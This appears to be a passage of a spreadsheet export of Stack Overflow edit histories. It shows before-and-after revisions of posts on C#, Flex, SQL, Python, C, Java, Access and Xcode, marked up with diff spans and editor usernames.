foreach( string s in valueColl )_x000D_
{_x000D_
    Console.WriteLine(&lt;span class="diff-add"&gt;"Value&lt;/span&gt; = {&lt;span class="diff-add"&gt;0&lt;/span&gt;}"&lt;span class="diff-add"&gt;, s&lt;/span&gt;);_x000D_
}_x000D_
_x000D_
// To get the keys alone, use the Keys property._x000D_
Dictionary&amp;lt;string, string&amp;gt;.KeyCollection keyColl =_x000D_
    openWith.Keys;_x000D_
_x000D_
// The elements of the KeyCollection are strongly typed_x000D_
// with the type that was specified for dictionary keys._x000D_
Console.WriteLine();_x000D_
foreach( string s in keyColl )_x000D_
{_x000D_
    Console.WriteLine(&lt;span class="diff-add"&gt;"Key&lt;/span&gt; = {&lt;span class="diff-add"&gt;0&lt;/span&gt;}"&lt;span class="diff-add"&gt;, s&lt;/span&gt;);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>user3956566</t>
  </si>
  <si>
    <t>blenderfreaky</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is it possible to use the Flex Framework and Components, without using MXML? I know ActionScript pretty decently, and don't feel like messing around with some new XML language just to get some simple UI in there. Can anyone provide an example consisting of an .as file which can be compiled (ideally via FlashDevelop, though just telling how to do it with the Flex SDK is ok too) and uses the Flex Framework? For example, just showing a Flex button that pops open an Alert would be perfect.&lt;/p&gt; _x000D_
 &lt;p&gt; If it's not possible, can someone provide a minimal MXML file which will bootstrap a custom AS class which then has access to the Flex SDK?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; gsadzrbzsd&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is it possible to use the Flex Framework and Components, without using MXML? I know ActionScript pretty decently, and don't feel like messing around with some new XML language just to get some simple UI in there. Can anyone provide an example consisting of an .as file which can be compiled (ideally via FlashDevelop, though just telling how to do it with the Flex SDK is ok too) and uses the Flex Framework? For example, just showing a Flex button that pops open an Alert would be perfect.&lt;/p&gt; _x000D_
 &lt;p&gt; If it's not possible, can someone provide a minimal MXML file which will bootstrap a custom AS class which then has access to the Flex SDK?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>davr</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I can select all the &lt;span class="diff-delete"&gt;DISTINCT&lt;/span&gt; values in a column in the following ways:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;code&gt;SELECT DISTINCT column_name FROM table_name;&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;SELECT column_name FROM table_name GROUP BY column_name;&lt;/code&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; But how do I get the row count from that query? Is a &lt;span class="diff-delete"&gt;sub-query&lt;/span&gt; required?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I can select all the &lt;span class="diff-add"&gt;distinct&lt;/span&gt; values in a column in the following ways:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;code&gt;SELECT DISTINCT column_name FROM table_name;&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;code&gt;SELECT column_name FROM table_name GROUP BY column_name;&lt;/code&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; But how do I get the row count from that query? Is a &lt;span class="diff-add"&gt;subquery&lt;/span&gt; required?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Christian Oudard</t>
  </si>
  <si>
    <t>NewOnStackoverflow</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; OK, great. I just tossed together this example with a tuple, not a filename, but that's easy. Thanks all.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;class MyData:_x000D_
    def __init__(self, data):_x000D_
        self.myList = &lt;span class="diff-delete"&gt;list&lt;/span&gt;(data)_x000D_
_x000D_
    def GetData(self):_x000D_
        print self.myList_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; a = [1,2]&lt;/p&gt; _x000D_
 &lt;p&gt; b = (2,3)&lt;/p&gt; _x000D_
 &lt;p&gt; c = MyData(a)&lt;/p&gt; _x000D_
 &lt;p&gt; d = MyData(b)&lt;/p&gt; _x000D_
 &lt;p&gt; c.GetData()&lt;/p&gt; _x000D_
 &lt;p&gt; d.GetData()&lt;/p&gt; _x000D_
 &lt;p&gt; [1, 2]&lt;/p&gt; _x000D_
 &lt;p&gt; [2, 3]&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; OK, great. I just tossed together this example with a tuple, not a filename, but that's easy. Thanks all.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;class MyData:_x000D_
    def __init__(self, data):_x000D_
        self.myList = &lt;span class="diff-add"&gt;[]_x000D_
        if isinstance&lt;/span&gt;(data&lt;span class="diff-add"&gt;, tuple&lt;/span&gt;)&lt;span class="diff-add"&gt;:_x000D_
            for i in data:_x000D_
                self.myList.append(i)_x000D_
        else:_x000D_
            self.myList = data&lt;/span&gt;_x000D_
_x000D_
    def GetData(self):_x000D_
        print self.myList_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; a = [1,2]&lt;/p&gt; _x000D_
 &lt;p&gt; b = (2,3)&lt;/p&gt; _x000D_
 &lt;p&gt; c = MyData(a)&lt;/p&gt; _x000D_
 &lt;p&gt; d = MyData(b)&lt;/p&gt; _x000D_
 &lt;p&gt; c.GetData()&lt;/p&gt; _x000D_
 &lt;p&gt; d.GetData()&lt;/p&gt; _x000D_
 &lt;p&gt; [1, 2]&lt;/p&gt; _x000D_
 &lt;p&gt; [2, 3]&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Baltimark</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; #MS compiler &lt;span class="diff-delete"&gt;predefined macros&lt;/span&gt; can be found &lt;a href="http://gcc.gnu.org/onlinedocs/cpp/Predefined-Macros.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I think you are looking for&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;_WIN32&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; and &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;_WIN64&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;h1&gt;&lt;span class="diff-delete"&gt;GCC compiler predefined macros can be found &lt;/span&gt;&lt;a href="https://gcc.gnu.org/onlinedocs/cpp/Common-Predefined-Macros.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/h1&gt; _x000D_
 &lt;p&gt; I think you are looking for&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;__GNUC__&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;h1&gt;&lt;span class="diff-delete"&gt;Other compiler predefined macros can be found &lt;/span&gt;&lt;a href="//google.com" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/h1&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; #MS compiler &lt;span class="diff-add"&gt;PreDefined Macros&lt;/span&gt; can be found &lt;span class="diff-add"&gt;here:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/b0084kay(VS.80).aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://msdn.microsoft.com/en-us/library/b0084kay(VS.80).aspx&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; I think you are looking for&lt;span class="diff-add"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-add"&gt; _WIN32&lt;/span&gt;&lt;br&gt;&lt;span class="diff-add"&gt; _WIN64&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; #gcc compiler PreDefined MAcros can be found here:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;a href="http://gcc.gnu.org/onlinedocs/cpp/Predefined-Macros.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://gcc.gnu.org/onlinedocs/cpp/Predefined-Macros.html&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; I think you are looking for&lt;span class="diff-add"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-add"&gt; __GNUC__&lt;/span&gt;&lt;br&gt;&lt;span class="diff-add"&gt; __GNUC_MINOR__&lt;/span&gt;&lt;br&gt;&lt;span class="diff-add"&gt; __GNUC_PATCHLEVEL__&lt;/span&gt;&lt;br&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Do a google for your appropriate compilers pre-defined.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Martin York</t>
  </si>
  <si>
    <t>MD XF</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Maybe concatenate the current working directory with argv[0]? I'm not sure if that would work in Windows but it works in linux.&lt;/p&gt; _x000D_
 &lt;p&gt; For example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#include &amp;lt;stdio.h&amp;gt;_x000D_
#include &amp;lt;unistd.h&amp;gt;_x000D_
#include &amp;lt;string.h&amp;gt;_x000D_
_x000D_
int main(int argc, char **argv) {_x000D_
    char the_path[256];_x000D_
&lt;span class="diff-delete"&gt;    char cwd[256];_x000D_
&lt;/span&gt;_x000D_
    getcwd&lt;span class="diff-delete"&gt;(cwd, 255);_x000D_
_x000D_
    strcpy&lt;/span&gt;(the_path, &lt;span class="diff-delete"&gt;cwd&lt;/span&gt;);_x000D_
    strcat(the_path, "/");_x000D_
    strcat(the_path, argv[0]);_x000D_
_x000D_
    printf("%s\n", the_path);_x000D_
_x000D_
    return 0;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; When run, it outputs:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;jeremy@jeremy-desktop:~/Desktop$ ./test_x000D_
/home/jeremy/Desktop/./test_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Maybe concatenate the current working directory with argv[0]? I'm not sure if that would work in Windows but it works in linux.&lt;/p&gt; _x000D_
 &lt;p&gt; For example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#include &amp;lt;stdio.h&amp;gt;_x000D_
#include &amp;lt;unistd.h&amp;gt;_x000D_
#include &amp;lt;string.h&amp;gt;_x000D_
_x000D_
int main(int argc, char **argv) {_x000D_
    char the_path[256];_x000D_
_x000D_
    getcwd(the_path, &lt;span class="diff-add"&gt;255&lt;/span&gt;);_x000D_
    strcat(the_path, "/");_x000D_
    strcat(the_path, argv[0]);_x000D_
_x000D_
    printf("%s\n", the_path);_x000D_
_x000D_
    return 0;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; When run, it outputs:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-add"&gt; jeremy@jeremy-desktop:~/Desktop$ ./test&lt;/span&gt;&lt;br&gt;&lt;span class="diff-add"&gt; /home/jeremy/Desktop/./test&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jeremy Ruten</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; No. It's very easy to check.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public class Catch {_x000D_
    public static void main(String[] args) {_x000D_
        try {_x000D_
            throw new java.io.IOException();_x000D_
        } catch (java.io.IOException exc) {_x000D_
            System.err.println("In catch IOException: "+exc.getClass());_x000D_
            throw new RuntimeException();_x000D_
        } catch (Exception exc) {_x000D_
            System.err.println("In catch Exception: "+exc.getClass());_x000D_
        } finally {_x000D_
            System.err.println("In finally");_x000D_
        }_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Should print:&lt;/p&gt; _x000D_
 &lt;pre&gt;In catch IOException: class java.io.IOException_x000D_
In finally_x000D_
Exception in thread "main" java.lang.RuntimeException_x000D_
        at Catch.main(Catch.java:8)&lt;/pre&gt; _x000D_
 &lt;p&gt; Technically that could have been a compiler bug, implementation dependent, &lt;span class="diff-delete"&gt;unspecified behavior&lt;/span&gt;, or something. However, the JLS is pretty well nailed down and the compilers &lt;span class="diff-delete"&gt;are smart&lt;/span&gt; enough for these sort of simple things (generics corner case may be a different matter).&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Also&lt;/span&gt; note, if you swap around the two catch blocks, it wont compile. The second catch would be completely unreachable.&lt;/p&gt; _x000D_
 &lt;p&gt; Note finally is always called even if a catch is executed. (other than silly cases, such as infinite loops, attaching through the tools interface and killing the thread, rewriting bytecode, etc.).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; No. It's very easy to check.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public class Catch {_x000D_
    public static void main(String[] args) {_x000D_
        try {_x000D_
            throw new java.io.IOException();_x000D_
        } catch (java.io.IOException exc) {_x000D_
            System.err.println("In catch IOException: "+exc.getClass());_x000D_
            throw new RuntimeException();_x000D_
        } catch (Exception exc) {_x000D_
            System.err.println("In catch Exception: "+exc.getClass());_x000D_
        } finally {_x000D_
            System.err.println("In finally");_x000D_
        }_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Should print:&lt;/p&gt; _x000D_
 &lt;pre&gt;In catch IOException: class java.io.IOException_x000D_
In finally_x000D_
Exception in thread "main" java.lang.RuntimeException_x000D_
        at Catch.main(Catch.java:8)&lt;/pre&gt; _x000D_
 &lt;p&gt; Technically that could have been a compiler bug, implementation dependent, &lt;span class="diff-add"&gt;unspeicifed behaviour&lt;/span&gt;, or something. However, the JLS is pretty well nailed down and the compilers &lt;span class="diff-add"&gt;could&lt;/span&gt; enough for these sort of simple things (generics corner case may be a different matter).&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Alos&lt;/span&gt; note, if you swap around the two catch blocks, it wont compile. The second catch would be completely unreachable.&lt;/p&gt; _x000D_
 &lt;p&gt; Note finally is always called even if a catch is executed. (other than silly cases, such as infinite loops, attaching through the tools interface and killing the thread, rewriting bytecode, etc.).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>NotAgain says Reinstate Monica</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You need to go to &lt;a href="http://support.microsoft.com" rel="nofollow noreferrer"&gt;http://support.microsoft.com&lt;/a&gt; and search for the JetComp.exe utility, which will attempt to repair and compact your MDB without opening the file. The reason none of the suggestions above work is because they have to open the MDB to do their work, whereas JetComp doesn't open the file, but operates on it structurally.&lt;/p&gt; _x000D_
 &lt;p&gt; If it can't recover your file (which does happen), then you'll have to go to a data recovery service. I recommend Peter Miller of PKSolutions.com.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You need to go to &lt;a href="http://support.microsoft.com" rel="nofollow noreferrer"&gt;http://support.microsoft.com&lt;/a&gt; and search for the JetComp.exe utility, which will attempt to repair and compact your MDB without opening the file. The reason none of the suggestions above work is because they have to open the MDB to do their work, whereas JetComp doesn't open the file, but operates on it structurally.&lt;/p&gt; _x000D_
 &lt;p&gt; If it can't recover your file (which does happen), then you'll have to go to a data recovery service. I recommend Peter Miller of PKSolutions.com.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt;-- &lt;/span&gt;&lt;br&gt;&lt;span class="diff-add"&gt; David W. Fenton&lt;/span&gt;&lt;br&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="http://dfenton.com/DFA/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;David Fenton Associates&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>David-W-Fenton</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have an opensource framework for working with CSV and flat files in general. Maybe it's worth looking: &lt;a href="http://jfilehelpers.com" rel="nofollow noreferrer" title="JFileHelpers"&gt;JFileHelpers&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; With that toolkit you can write code using beans, like:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;@FixedLengthRecord()_x000D_
public class Customer {_x000D_
    @FieldFixedLength(4)_x000D_
    public Integer custId;_x000D_
_x000D_
    @FieldAlign(alignMode=AlignMode.Right)_x000D_
    @FieldFixedLength(20)_x000D_
    public String name;_x000D_
_x000D_
    @FieldFixedLength(3)_x000D_
    public Integer rating;_x000D_
_x000D_
    @FieldTrim(trimMode=TrimMode.Right)_x000D_
    @FieldFixedLength(10)_x000D_
    @FieldConverter(converter = ConverterKind.Date, _x000D_
    format = "dd-MM-yyyy")_x000D_
    public Date addedDate;_x000D_
    _x000D_
    @FieldFixedLength(3)_x000D_
    @FieldOptional_x000D_
    public String stockSimbol;  _x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;And&lt;/span&gt; then just parse your text files &lt;span class="diff-delete"&gt;like&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;FileHelperEngine&amp;lt;Customer&amp;gt; engine = _x000D_
   new FileHelperEngine&amp;lt;Customer&amp;gt;(Customer.class);&lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
List&amp;lt;Customer&amp;gt; customers = new ArrayList&amp;lt;Customer&amp;gt;();_x000D_
_x000D_
customers = engine.readResource("/samples/customers-fixed.txt");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And you'll have a collection of parsed objects.&lt;/p&gt; _x000D_
 &lt;p&gt; Hope that helps!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have an opensource framework for working with CSV and flat files in general. Maybe it's worth looking: &lt;a href="http://jfilehelpers.com" rel="nofollow noreferrer" title="JFileHelpers"&gt;JFileHelpers&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; With that toolkit you can write code using beans, like:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;@FixedLengthRecord()_x000D_
public class Customer {_x000D_
    @FieldFixedLength(4)_x000D_
    public Integer custId;_x000D_
_x000D_
    @FieldAlign(alignMode=AlignMode.Right)_x000D_
    @FieldFixedLength(20)_x000D_
    public String name;_x000D_
_x000D_
    @FieldFixedLength(3)_x000D_
    public Integer rating;_x000D_
_x000D_
    @FieldTrim(trimMode=TrimMode.Right)_x000D_
    @FieldFixedLength(10)_x000D_
    @FieldConverter(converter = ConverterKind.Date, _x000D_
    format = "dd-MM-yyyy")_x000D_
    public Date addedDate;_x000D_
    _x000D_
    @FieldFixedLength(3)_x000D_
    @FieldOptional_x000D_
    public String stockSimbol;  _x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;and&lt;/span&gt; then just parse your text files &lt;span class="diff-add"&gt;using&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;FileHelperEngine&amp;lt;Customer&amp;gt; engine = _x000D_
&lt;span class="diff-add"&gt; &lt;/span&gt;   new FileHelperEngine&amp;lt;Customer&amp;gt;(Customer.class); _x000D_
List&amp;lt;Customer&amp;gt; customers =&lt;span class="diff-add"&gt; _x000D_
   &lt;/span&gt; new ArrayList&amp;lt;Customer&amp;gt;();_x000D_
_x000D_
customers = engine.readResource(&lt;span class="diff-add"&gt;_x000D_
    &lt;/span&gt;"/samples/customers-fixed.txt");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And you'll have a collection of parsed objects.&lt;/p&gt; _x000D_
 &lt;p&gt; Hope that helps!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; While the one class per file policy is strictly enforced in java, &lt;span class="diff-delete"&gt;it's&lt;/span&gt; not required by C#. However, &lt;span class="diff-delete"&gt;it's&lt;/span&gt; generally a good idea.&lt;/p&gt; _x000D_
 &lt;p&gt; I typically break this rule if I have a very small helper class that is only used by the main class, but I prefer to do that as a nested inner class for &lt;span class="diff-delete"&gt;clarity's&lt;/span&gt; sake.&lt;/p&gt; _x000D_
 &lt;p&gt; You can however, split a single class into multiple files &lt;a href="http://msdn.microsoft.com/en-us/library/wa80x488.aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;using the &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;partial&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; keyword&lt;/span&gt;&lt;/a&gt;. This is useful for separating your code from wizard&lt;span class="diff-delete"&gt;-generated&lt;/span&gt; code.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; While the one class per file policy is strictly enforced in java, &lt;span class="diff-add"&gt;its&lt;/span&gt; not required by C#. However, &lt;span class="diff-add"&gt;its&lt;/span&gt; generally a good idea.&lt;/p&gt; _x000D_
 &lt;p&gt; I typically break this rule if I have a very small helper class that is only used by the main class, but I prefer to do that as a nested inner class for &lt;span class="diff-add"&gt;clarities&lt;/span&gt; sake.&lt;/p&gt; _x000D_
 &lt;p&gt; You can however, split a single class into multiple files &lt;span class="diff-add"&gt;using the partial keyword&lt;/span&gt;. This is useful for separating your code from wizard&lt;span class="diff-add"&gt; generated&lt;/span&gt; code.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Blair Conrad</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;kbd&gt;&lt;span class="diff-delete"&gt;Command âŒ˜&lt;/span&gt;&lt;/kbd&gt; + &lt;code&gt;Double-&lt;span class="diff-delete"&gt;click&lt;/span&gt; on a symbol&lt;/code&gt;: Jump to Definition of a symbol.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;kbd&gt;&lt;span class="diff-delete"&gt;Option âŒ¥&lt;/span&gt;&lt;/kbd&gt; + &lt;code&gt;Double-&lt;span class="diff-delete"&gt;click&lt;/span&gt; on a symbol&lt;/code&gt;: Find Text in Documentation of a symbol. (Only works if you have &lt;span class="diff-delete"&gt;the&lt;/span&gt; symbol's Doc Set installed.)&lt;/p&gt; _x000D_
 &lt;h2&gt;Favorites Bar:&lt;/h2&gt; _x000D_
 &lt;p&gt; Favorites bar is just like you have in Safari for storing - well - favorites. I often use it as a place to store shortcuts to files I am using right now. Generally this is more useful when I'm working with a large or unfamiliar project.&lt;/p&gt; _x000D_
 &lt;p&gt; To show the Favorites Bar, select the following menu option:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;code&gt;View&lt;/code&gt; &amp;gt; &lt;code&gt;Layout&lt;/code&gt; &amp;gt; &lt;code&gt;Show Favorites Bar&lt;/code&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;kbd&gt;&lt;span class="diff-add"&gt;âŒ˜ Command&lt;/span&gt;&lt;/kbd&gt; + &lt;code&gt;Double-&lt;span class="diff-add"&gt;Click&lt;/span&gt; on a symbol&lt;/code&gt;: Jump to Definition of a symbol.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;kbd&gt;&lt;span class="diff-add"&gt;âŒ¥ Option&lt;/span&gt;&lt;/kbd&gt; + &lt;code&gt;Double-&lt;span class="diff-add"&gt;Click&lt;/span&gt; on a symbol&lt;/code&gt;: Find Text in Documentation of a symbol. (Only works if you have &lt;span class="diff-add"&gt;they&lt;/span&gt; symbol's Doc Set installed.)&lt;/p&gt; _x000D_
 &lt;h2&gt;Favorites Bar:&lt;/h2&gt; _x000D_
 &lt;p&gt; Favorites bar is just like you have in Safari for storing - well - favorites. I often use it as a place to store shortcuts to files I am using right now. Generally this is more useful when I'm working with a large or unfamiliar project.&lt;/p&gt; _x000D_
 &lt;p&gt; To show the Favorites Bar, select the following menu option:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;code&gt;View&lt;/code&gt; &amp;gt; &lt;code&gt;Layout&lt;/code&gt; &amp;gt; &lt;code&gt;Show Favorites Bar&lt;/code&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>schwa</t>
  </si>
  <si>
    <t>Senseful</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Within a function, variables that are assigned &lt;span class="diff-delete"&gt;to&lt;/span&gt; are &lt;span class="diff-delete"&gt;treated as&lt;/span&gt; local variables&lt;span class="diff-delete"&gt; by default&lt;/span&gt;. To assign to global variables, use the &lt;a href="http://www.python.org/doc/ref/global.html" rel="nofollow noreferrer"&gt;&lt;code&gt;global&lt;/code&gt;&lt;/a&gt; statement:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def g(n):_x000D_
    global c_x000D_
    c = c + n_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This is one of the quirky areas of Python that has never really sat well with me.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Within a function, variables that are assigned &lt;span class="diff-add"&gt;before they&lt;/span&gt; are &lt;span class="diff-add"&gt;referenced end up being&lt;/span&gt; local variables. To assign to global variables, use the &lt;a href="http://www.python.org/doc/ref/global.html" rel="nofollow noreferrer"&gt;&lt;code&gt;global&lt;/code&gt;&lt;/a&gt; statement:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def g(n):_x000D_
    global c_x000D_
